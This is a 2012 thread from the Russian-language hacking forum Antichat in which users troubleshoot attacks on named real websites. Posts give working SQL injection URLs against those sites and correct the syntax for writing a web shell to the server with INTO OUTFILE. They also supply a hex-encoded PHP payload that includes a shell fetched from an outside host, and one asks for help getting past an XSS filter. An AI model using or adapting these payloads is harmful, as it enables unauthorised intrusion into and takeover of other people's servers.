ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.06.2012, 02:22
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251
Репутация:
796
|
|
Сообщение от Dr.Strangelove
Dr.Strangelove said:
http://www.umoncton.ca/nouvelles/info.php?id=8297-2
http://www.umoncton.ca/nouvelles/info.php?id=8297+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39
Здесь была классическая sql-inj , но некоторое время назад произошли какие-то изменения и скуля не работает как раньше. Не могу въехать
что конкретно
за изменения произошли. Кто может разобраться в чем дело? Ну и конечно как это дело обойти?
а.)запрос не зафолсен
б.)комментарий не поставлен
синтаксически верный запрос
Код:
Code:
http://www.umoncton.ca/nouvelles/info.php?id=8297+and+0+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
|
|
|
23.06.2012, 11:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Не могу разобраться с заливкой веб-шелла через MySQL inj.
Вот пример:
Сообщение от None
http://www.sstrade.ru/goods.php?id=1-1+UNION+SELECT+null,null,null,null,null,null,
0x5a65643078
+into+outfile+
0x2f746d702f6161612e706870
+--+
В первом выделенном фрагменте я указал текст, во втором я указал УНИКАЛЬНЫЙ путь до файла. Почему он мне выдает ошибку синтаксиса SQL? |
|
|
|
23.06.2012, 11:18
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 26
Провел на форуме:
143670
Репутация:
10
|
|
Сообщение от Zed0x
Zed0x said:
Не могу разобраться с заливкой веб-шелла через MySQL inj.
Вот пример:
В первом выделенном фрагменте я указал текст, во втором я указал УНИКАЛЬНЫЙ путь до файла. Почему он мне выдает ошибку синтаксиса SQL?
Ты так не зальешь шелл. Путь к файлу надо указывать не в hex'е. Только так, например into outfile '/var/www/site.com/shell.php'
|
|
|
|
23.06.2012, 11:37
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Сообщение от Zed0x
Zed0x said:
Не могу разобраться с заливкой веб-шелла через MySQL inj.
Вот пример:
В первом выделенном фрагменте я указал текст, во втором я указал УНИКАЛЬНЫЙ путь до файла. Почему он мне выдает ошибку синтаксиса SQL?
Потому что, как написал уже товарищ выше, строку, а здесь конкретно содержащую полный путь на сервере, нужно заключить в одинарные или двойные кавычки (согласно доку по мускулю), если же они фильтруются, то искать другие способы заливки.Грубо говоря, путь нужно в запросе передавать напрямую, а не в каком-либо ином виде.
|
|
|
|
23.06.2012, 16:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Спасибо t3cHn0iD,Dr.Strangelove!
А чуть не забыл, еще вопрос: в ФАКЕ об заливке через mysql inj, написан вот такой пример:
Сообщение от None
http://research.udmercy.edu/ids/technoclass.php?id=-6+UNION+SELECT+null,'text',null,null,null,nu ll+
from+accounts
+into+outfile+'/tmp/aaa.php'/*
Мне не понятно именно этот момент, зачем здесь указывать имя БД? Это вообще обязательно? Вот например SQL inj:
Сообщение от None
site.com/news.php?id=1'+union+select+1,2,'hacked'+into+outf ile+'/tmp/web_shell.php'
Данная конструкция будет работать, или же сначала нужно через information_schema вытащить БД? |
|
|
|
23.06.2012, 16:29
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Zed0x
Zed0x said:
Спасибо
t3cHn0iD,Dr.Strangelove
!
А чуть не забыл, еще вопрос:
в ФАКЕ об заливке через mysql inj, написан вот такой пример:
Мне не понятно именно этот момент, зачем здесь указывать имя БД? Это вообще обязательно? Вот например SQL inj:
Данная конструкция будет работать, или же сначала нужно через information_schema вытащить БД?
в mysql 3 нужно было указывать базу
|
|
|
|
23.06.2012, 17:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
28262
Репутация:
23
|
|
Del msg
|
|
|
|
23.06.2012, 17:48
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885
Репутация:
34
|
|
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
$replace = array("");
|
|
|
|
23.06.2012, 17:50
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Zed0x
Zed0x said:
Спасибо попугай, понял как заливать текст в файл php! А как теперь залить именно шелл?
Вот например вот так у меня не получается:
PHP код:
PHP:
[COLOR="#000000"]http://imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+null,'[COLOR="#0000BB"][/COLOR]',null,null,null,null,null+into+dumpfile+'/tmp/25aa.php'+--+[/COLOR]
Не подскажешь почему? код самого шела переведи в хекс, в итоге у тебя место
должно быть 0x3c3f70687020696e636c7564652022687474703a2f2f7777 772e736974652e636f6d2f7368656c6c2e706870223f3e
Пример:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+null,0x3c3f70687020696e636c7564652022687474703a2f2f7777772e736974652e636f6d2f7368656c6c2e706870223f3e,null,null,null,null,null+into+dumpfile+'/tmp/25aa.php'+--+[/COLOR][/COLOR]
|
|
|
|
23.06.2012, 18:02
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to RazyKK
Можно ipt>, оставит ну и в том же духе, я думаю вектор понятен?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
